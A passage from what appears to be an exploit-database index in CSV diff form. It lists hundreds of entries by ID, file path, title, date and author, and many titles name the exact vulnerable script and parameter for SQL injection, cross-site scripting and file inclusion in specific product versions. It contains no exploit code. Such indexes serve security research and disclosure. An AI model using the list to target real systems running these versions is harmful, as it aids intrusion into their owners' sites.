- 'roomid' SQL Injection",2008-03-06,meloulisi,webapps,php, +31352,exploits/php/webapps/31352.txt,"ImageVue 1.7 - 'popup.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,webapps,php, +31353,exploits/php/webapps/31353.txt,"ImageVue 1.7 - 'dir2.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,webapps,php, +31354,exploits/php/webapps/31354.txt,"ImageVue 1.7 - 'upload.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,webapps,php, +31355,exploits/php/webapps/31355.txt,"ImageVue 1.7 - 'dirxml.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,webapps,php, +31356,exploits/php/webapps/31356.txt,"WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,webapps,php, +31357,exploits/php/webapps/31357.txt,"WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,webapps,php, +31358,exploits/php/webapps/31358.txt,"Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion",2008-03-07,ZoRLu,webapps,php, +31365,exploits/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath' Cross-Site Scripting",2008-03-08,nnposter,webapps,php, +31366,exploits/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath.0' Arbitrary File Access",2008-03-08,nnposter,webapps,php, +31367,exploits/php/webapps/31367.txt,"Batchelor Media BM Classifieds - Multiple SQL Injections",2008-03-09,xcorpitx,webapps,php, +31368,exploits/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' SQL Injection",2008-03-10,meloulisi,webapps,php, +31369,exploits/php/webapps/31369.txt,"Gallarific - 'search.php?query' Cross-Site Scripting",2008-03-10,ZoRLu,webapps,php, +31370,exploits/php/webapps/31370.txt,"Gallarific - Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,webapps,php, +31371,exploits/php/webapps/31371.txt,"EasyImageCatalogue 1.31 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php, +31372,exploits/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - 'thumber.php?dir' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php, +31373,exploits/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - 'describe.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php, +31374,exploits/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - 'addcomment.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php, +31375,exploits/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Local File Inclusion",2008-03-10,THE_MILLER,webapps,php, +31377,exploits/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' SQL Injection",2008-03-10,Lovebug,webapps,php, +31379,exploits/php/webapps/31379.txt,"EncapsGallery 1.11.2 - 'watermark.php?File' Cross-Site Scripting",2008-03-10,ZoRLu,webapps,php, +31380,exploits/php/webapps/31380.txt,"EncapsGallery 1.11.2 - 'catalog_watermark.php?file' Cross-Site Scripting",2008-03-10,ZoRLu,webapps,php, +31382,exploits/php/webapps/31382.txt,"Joomla! / Mambo Component ensenanzas - 'id' SQL Injection",2008-03-11,The-0utl4w,webapps,php, +31383,exploits/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' SQL Injection",2008-03-11,Houssamix,webapps,php, +31384,exploits/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' SQL Injection",2008-03-11,Lovebug,webapps,php, +31387,exploits/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,webapps,php, +31388,exploits/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,webapps,php, +31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php, +31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php, +31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php, +31392,exploits/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' SQL Injection",2008-03-12,S@BUN,webapps,php, +31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php, +31697,exploits/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",webapps,php, +31400,exploits/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,webapps,php, +31401,exploits/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Inclusion",2008-03-12,U238,webapps,php, +31402,exploits/php/webapps/31402.txt,"eWeather - 'chart' Cross-Site Scripting",2008-03-12,NetJackal,webapps,php, +31404,exploits/asp/webapps/31404.txt,"Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection",2008-03-13,The-0utl4w,webapps,asp, +31406,exploits/php/webapps/31406.txt,"SNewsCMS 2.x - 'search.php' Cross-Site Scripting",2008-03-17,medprostuda.ru,webapps,php, +31408,exploits/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,webapps,php, +31410,exploits/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' SQL Injection",2008-03-17,The-0utl4w,webapps,php, +31411,exploits/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,webapps,cgi, +31413,exploits/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,webapps,asp, +31414,exploits/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",webapps,php, +31415,exploits/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,webapps,php, +31416,exploits/php/webapps/31416.txt,"webSPELL 4.1.2 - 'index.php' Cross-Site Scripting",2008-03-18,n3w7u,webapps,php, +31418,exploits/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,webapps,php,80 +31419,exploits/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,webapps,php,80 +31420,exploits/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,webapps,php,80 +31421,exploits/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,AtT4CKxT3rR0r1ST,webapps,php,80 +31423,exploits/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,webapps,windows, +31424,exploits/php/webapps/31424.txt,"WordPress Theme Dandelion - Arbitrary File Upload",2014-02-05,TheBlackMonster,webapps,php,80 +31425,exploits/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",webapps,hardware,80 +31426,exploits/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,webapps,php,80 +31427,exploits/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,webapps,php,80 +31430,exploits/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",webapps,hardware,80 +31431,exploits/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",webapps,php,80 +31435,exploits/php/webapps/31435.py,"Joomla! Component com_community 2.6 - Code Execution",2014-02-05,"Matias Fontanini",webapps,php,80 +31436,exploits/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,webapps,php,80 +31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java, +31439,exploits/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,webapps,php, +31441,exploits/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,webapps,php, +31442,exploits/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,webapps,asp, +31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php, +31445,exploits/jsp/webapps/31445.txt,"Elastic Path 4.1 - '/manager/getImportFileRedirect.jsp?file' Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",webapps,jsp, +31446,exploits/jsp/webapps/31446.txt,"Elastic Path 4.1 - '/manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",webapps,jsp, +31447,exploits/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,webapps,php, +31448,exploits/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' SQL Injection",2008-03-20,Cr@zy_King,webapps,php, +31449,exploits/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31450,exploits/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31451,exploits/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31452,exploits/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31453,exploits/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31454,exploits/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31455,exploits/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31456,exploits/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31457,exploits/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,webapps,php, +31458,exploits/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,webapps,php,80 +31459,exploits/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,webapps,php,80 +31469,exploits/php/webapps/31469.txt,"ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,webapps,php, +31470,exploits/php/webapps/31470.txt,"ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,webapps,php, +31471,exploits/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting",2008-03-22,Y433r,webapps,php, +31472,exploits/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting",2008-03-22,Linux_Drox,webapps,php, +31475,exploits/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,webapps,jsp, +31476,exploits/php/webapps/31476.txt,"Efestech E-Kontor - 'id' SQL Injection",2008-03-24,RMx,webapps,php, +31480,exploits/php/webapps/31480.txt,"Quick Classifieds 1.0 - 'locate.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31482,exploits/php/webapps/31482.txt,"Quick Classifieds 1.0 - 'Classifieds/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31483,exploits/php/webapps/31483.txt,"Quick Classifieds 1.0 - 'Classifieds/view.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31484,exploits/php/webapps/31484.txt,"Quick Classifieds 1.0 - 'controlcenter/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31485,exploits/php/webapps/31485.txt,"Quick Classifieds 1.0 - 'controlcenter/manager.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31486,exploits/php/webapps/31486.txt,"Quick Classifieds 1.0 - 'controlcenter/pass.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31487,exploits/php/webapps/31487.txt,"Quick Classifieds 1.0 - 'controlcenter/remember.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31488,exploits/php/webapps/31488.txt,"Quick Classifieds 1.0 - 'controlcenter/sign-up.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31489,exploits/php/webapps/31489.txt,"Quick Classifieds 1.0 - 'controlcenter/update.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31490,exploits/php/webapps/31490.txt,"Quick Classifieds 1.0 - 'controlcenter/userSet.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31491,exploits/php/webapps/31491.txt,"Quick Classifieds 1.0 - 'controlcenter/verify.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31492,exploits/php/webapps/31492.txt,"Quick Classifieds 1.0 - 'controlpannel/alterCats.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31493,exploits/php/webapps/31493.txt,"Quick Classifieds 1.0 - 'controlpannel/alterFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31494,exploits/php/webapps/31494.txt,"Quick Classifieds 1.0 - 'controlpannel/alterHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31495,exploits/php/webapps/31495.txt,"Quick Classifieds 1.0 - '/controlpannel/alterNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31496,exploits/php/webapps/31496.txt,"Quick Classifieds 1.0 - 'controlpannel/alterTheme.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31497,exploits/php/webapps/31497.txt,"Quick Classifieds 1.0 - 'controlpannel/color_help.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31498,exploits/php/webapps/31498.txt,"Quick Classifieds 1.0 - 'controlpannel/createdb.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31499,exploits/php/webapps/31499.txt,"Quick Classifieds 1.0 - 'controlpannel/createFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31500,exploits/php/webapps/31500.txt,"Quick Classifieds 1.0 - 'controlpannel/createHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31501,exploits/php/webapps/31501.txt,"Quick Classifieds 1.0 - 'controlpannel/createL.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31502,exploits/php/webapps/31502.txt,"Quick Classifieds 1.0 - 'controlpannel/createM.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31503,exploits/php/webapps/31503.txt,"Quick Classifieds 1.0 - '/controlpannel/createNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31504,exploits/php/webapps/31504.txt,"Quick Classifieds 1.0 - 'controlpannel/createP.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31505,exploits/php/webapps/31505.txt,"Quick Classifieds 1.0 - 'controlpannel/createS.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31506,exploits/php/webapps/31506.txt,"Quick Classifieds 1.0 - 'controlpannel/createT.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31507,exploits/php/webapps/31507.txt,"Quick Classifieds 1.0 - 'controlpannel/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31508,exploits/php/webapps/31508.txt,"Quick Classifieds 1.0 - 'controlpannel/mailadmin.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31509,exploits/php/webapps/31509.txt,"Quick Classifieds 1.0 - 'controlpannel/setUp.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31510,exploits/php/webapps/31510.txt,"Quick Classifieds 1.0 - 'include/sendit.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31511,exploits/php/webapps/31511.txt,"Quick Classifieds 1.0 - 'include/sendit2.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31512,exploits/php/webapps/31512.txt,"Quick Classifieds 1.0 - 'include/adminHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31513,exploits/php/webapps/31513.txt,"Quick Classifieds 1.0 - 'include/usersHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php, +31515,exploits/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php?zID' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",webapps,php,80 +31516,exploits/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",webapps,php,80 +31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80 +31520,exploits/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",webapps,php,80 +31521,exploits/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",webapps,php,80 +31525,exploits/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",webapps,php,80 +31527,exploits/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hard-Coded Credentials",2014-02-09,"Cesar Neira",webapps,hardware,80 +31535,exploits/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,webapps,php, +31537,exploits/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - '/webapps/BlackBoard/execute/viewCatalog?searchText' Cross-Site Scripting",2008-03-26,Knight4vn,webapps,cgi, +31538,exploits/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - '/bin/common/announcement.pl?data__announcements___pk1_pk2__subject' Cross-Site Scripting",2008-03-26,Knight4vn,webapps,cgi, +31539,exploits/php/webapps/31539.txt,"PHPAddressBook 2.0 - 'index.php' SQL Injection",2008-03-26,"Virangar Security",webapps,php, +31541,exploits/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security",2008-03-26,SHAHEE_MIRZA,webapps,php, +31543,exploits/php/webapps/31543.txt,"GeeCarts - 'show.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",webapps,php, +31544,exploits/php/webapps/31544.txt,"GeeCarts - 'search.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",webapps,php, +31545,exploits/php/webapps/31545.txt,"GeeCarts - 'view.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",webapps,php, +31546,exploits/asp/webapps/31546.txt,"DigiDomain 2.2 - 'lookup_result.asp?domain' Cross-Site Scripting",2008-03-27,Linux_Drox,webapps,asp, +31547,exploits/asp/webapps/31547.txt,"DigiDomain 2.2 - 'suggest_result.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-27,Linux_Drox,webapps,asp, +31985,exploits/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",webapps,hardware, +31549,exploits/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusions",2008-03-27,XxX,webapps,php, +31555,exploits/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusions",2008-03-28,Sibertrwolf,webapps,php, +40770,exploits/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,webapps,php, +40353,exploits/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,webapps,php, +31564,exploits/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,webapps,php, +31565,exploits/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - 'setup.php?language_setup' Cross-Site Scripting",2008-03-31,ZoRLu,webapps,php, +31566,exploits/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php?test' Cross-Site Scripting",2008-03-31,ZoRLu,webapps,php, +31567,exploits/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,webapps,php, +31568,exploits/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,webapps,php, +31569,exploits/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery",2014-02-11,killall-9,webapps,hardware,80 +31570,exploits/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",webapps,php,80 +31571,exploits/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",webapps,php,80 +32215,exploits/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +32216,exploits/php/webapps/32216.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php, +31573,exploits/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,webapps,ios,8880 +31578,exploits/windows/webapps/31578.txt,"Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",webapps,windows,80 +31579,exploits/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",webapps,windows, +31580,exploits/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_Guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,webapps,php, +31581,exploits/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,webapps,php, +31582,exploits/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' SQL Injection",2008-03-31,RMx,webapps,asp, +31584,exploits/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Inclusion",2008-04-01,"Joseph Giron",webapps,php, +31587,exploits/php/webapps/31587.txt,"EasySite 2.0 - 'browser.php' Remote File Inclusion",2008-04-02,ZoRLu,webapps,php, +31588,exploits/php/webapps/31588.txt,"EasySite 2.0 - 'image_editor.php' Remote File Inclusion",2008-04-02,ZoRLu,webapps,php, +31589,exploits/php/webapps/31589.txt,"EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion",2008-04-02,ZoRLu,webapps,php, +31590,exploits/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,webapps,php, +31595,exploits/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' SQL Injection",2008-04-03,The-0utl4w,webapps,php, +31596,exploits/php/webapps/31596.txt,"mcGallery 1.1 - 'admin.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31597,exploits/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31598,exploits/php/webapps/31598.txt,"mcGallery 1.1 - 'sess.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31599,exploits/php/webapps/31599.txt,"mcGallery 1.1 - 'stats.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31600,exploits/php/webapps/31600.txt,"mcGallery 1.1 - 'detail.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31601,exploits/php/webapps/31601.txt,"mcGallery 1.1 - 'resize.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31602,exploits/php/webapps/31602.txt,"mcGallery 1.1 - 'show.php?lang' Cross-Site Scripting",2008-04-03,K-9999,webapps,php, +31603,exploits/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger - Cross-Site Request Forgery",2008-04-03,poplix,webapps,php, +31604,exploits/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass - Cross-Site Request Forgery",2008-04-03,poplix,webapps,php, +31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php, +31606,exploits/php/webapps/31606.txt,"Glossaire 2.0 - 'glossaire.php' Cross-Site Scripting",2008-04-04,ZoRLu,webapps,php, +31608,exploits/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module - 'VIEW' Cross-Site Scripting",2008-04-04,"H-T Team",webapps,php, +31609,exploits/php/webapps/31609.txt,"Nuke ET 3.4 - 'mensaje' HTML Injection",2008-04-04,"Jose Luis Zayas",webapps,php, +31610,exploits/php/webapps/31610.txt,"RobotStats 0.1 - 'graph.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, +31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, +31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,webapps,php, +31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, +31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware, +31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,webapps,ios, +31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,webapps,java, +31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,webapps,php, +31623,exploits/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,webapps,php, +31625,exploits/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +31626,exploits/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection",2008-04-05,t0pP8uZz,webapps,php, +31628,exploits/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection / Cross-Site Scripting",2008-04-08,"Brad Antoniewicz",webapps,php, +31631,exploits/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' SQL Injection",2008-04-09,MantiS,webapps,php, +31633,exploits/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File 